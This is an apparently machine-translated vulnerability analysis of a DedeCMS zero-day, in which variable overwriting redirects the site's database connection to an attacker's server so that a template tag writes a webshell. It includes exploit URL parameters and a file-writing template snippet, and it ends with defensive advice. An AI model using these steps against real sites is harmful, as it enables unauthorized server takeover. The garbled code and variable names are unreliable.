Dede GetWebShell zero-day Vulnerability Analysis Report

Event Background:

 

Recently, many websites have been attacked. After research and analysis by quickshield Security laboratory, these websites use DedeCMS content management systems. DedeCMS has a very serious vulnerability, attackers can directly write a "one-sentence Trojan" to the server ".

 

The cause of the DedeCMS vulnerability is mainly caused by variable coverage. By submitting variables, attackers overwrite the global variables configured for database connection, so that the attacked website can reverse connect to the database specified by the attacker, reads the specified content and directly writes it to the attacked website. From the entire attack process, this attack method is also clever, avoiding the traditional injection, cracking, logon back-end and upload Trojan attack modes, attackers can directly write webshells to the website directory without authorization to control the website, causing serious harm.

 

With the increasing security awareness of website administrators, the introduction of network security devices, filtering of modules and programs, and traditional intrusion models are becoming increasingly stretched. From this attack, we found that traditional Web attack ideas are also changing, and they are slowly transitioning from forward attacks to reverse attacks. In fact, in system attacks, reverse attacks have long existed, in order to bypass front-end filtering devices in some firewall columns, attackers can use Trojans to enable the attacked machines to initiate connection requests to the attackers themselves. However, firewalls usually do not intercept connections actively discovered by machines, therefore, attackers can easily bypass a series of front-end filters and obstacles.

 

Analysis Report:

 

Let's take a look at the cause of the Dede vulnerability. First, let's take a look at the prototype of the variable coverage vulnerability:

 

VulTest. php:

 

　　

 

$ Anquanbao = "imiyoo_first ";

 

Foreach ($ _ GET as $ key => $ value)

 

$ Key = $ value;

 

Echo "\ $ anquanbao =". $ anquanbao;

 

?>

 

The attacker apparently submits a variable through $ _ GET to overwrite the defined variable. The effect is as follows:

 

　　

 

Pictures before attack

 

　　

 

Image after attack ($ anquanbao variable has been overwritten)

 

With the foundation of this vulnerability, let's take a look at the details of the Dede vulnerability. The vulnerability mainly occurs in the file/plus/mytag_js.php:

 

　　

 

 

 

First, read the processing process of this Code. At the beginning, the program will obtain the $ aid variable submitted by the user. If you need to display the variable, no cache content is required, the record is read from the database table '# @ _ mytag' and the read $ tagbody is written into the cache file as a Dede template.

 

Obviously, the $ aid injection vulnerability exists here, but because the table content is generally empty, and Dede filters the submitted single quotes, it is basically a chicken fault; however, with the variable Overwrite Vulnerability, attackers can exploit this vulnerability to overwrite the connection information of database configuration files and redirect database connections to a database controlled by attackers, in this way, attackers can completely control the content of $ tagbody. In the DedeCMS document management system, the template can embed PHP code, that is, attackers can execute their own PHP code, in this way, you can easily write a Trojan to the server to achieve the attack effect.

 

When testing the vulnerability, we found that the code for the Dede variable overwrite vulnerability is in/include/common. inc. php, as follows:

 

 

Through this code, we can overwrite any variables in the program. to overwrite the variables in the database configuration file, we can overwrite $ mongo_dbhost or $ GLOBALS [mongo_dbhost, therefore, we can submit the following test code:

 

Ø mytag_js.php? _ GET [mongo_dbhost] = www.2cto.com

 

Ø mytag_js.php? _ GET [GLOBALS] [mongo_dbhost] = www.2cto.com

 

However, DedeCMS also defends against such attacks, but only judges the key values in the submitted variables.

 

The Code is as follows:

 

　　

 

However, this variable $ _ k only determines the key value of one-dimensional data, while Dede extracts the variable in multiple dimensions, if the attacker submits a multi-dimensional variable, it can be easily bypassed. to bypass regular expression detection and overwrite the variable, we can easily think of the $ _ COOKIE variable, more importantly, Dede also supports the $ _ COOKIE submission variable, so we can get the following effective attack code:

 

Ø mytag_js.php? _ GET [_ COOKIE] [GLOBALS] [pai_dbhost] = www.2cto.com

 

The above code can bypass dededecms Regular Expression detection and overwrite the $ GLOBALS [mongo_dbhost] variable.

 

Analysis summary:

 

Through the above analysis, we can now clearly understand the entire attack process:

 

1. The attacker prepares a MySQL database in advance. The database contains a data table that indicates '# @ _ mytag'.' # @ 'is the table prefix of the database to be attacked, insert a record in the table to control the content of $ tagbody, so that it can write a sentence Trojan, and Dede uses the template to write a sentence Trojan Code as follows:

 

{Dede: php}

 

$ Fp = @ fopen ("test. php", \ 'a \');

 

@ Fwrite ($ fp ,\'\');

 

Echo "OK ";

 

@ Fclose ($ fp );

 

{/Dede: php}

 

2. If you submit a variable overwrite statement to read the specified content in the table, you can write a trojan in the current path.

 

Since many websites that use DedeCMS have not fixed this vulnerability, no harmful attack code will be published here.

 

Security suggestions:

 

Many programmers perform recursive parsing on multi-dimensional array variables in processing the variables obtained by $ _ GET, $ _ POST, or $ _ COOKIE, however, when filtering, the key values of each dimension are not judged and detected. For example, in the 0day of Dede, the programmer only checks the key values of two-dimensional arrays, however, attackers can easily generate COOKIE variables by submitting 3D arrays. Therefore, when ensuring that the program can parse multi-dimensional variables, the programmer also needs to effectively detect and judge the key values of each dimension.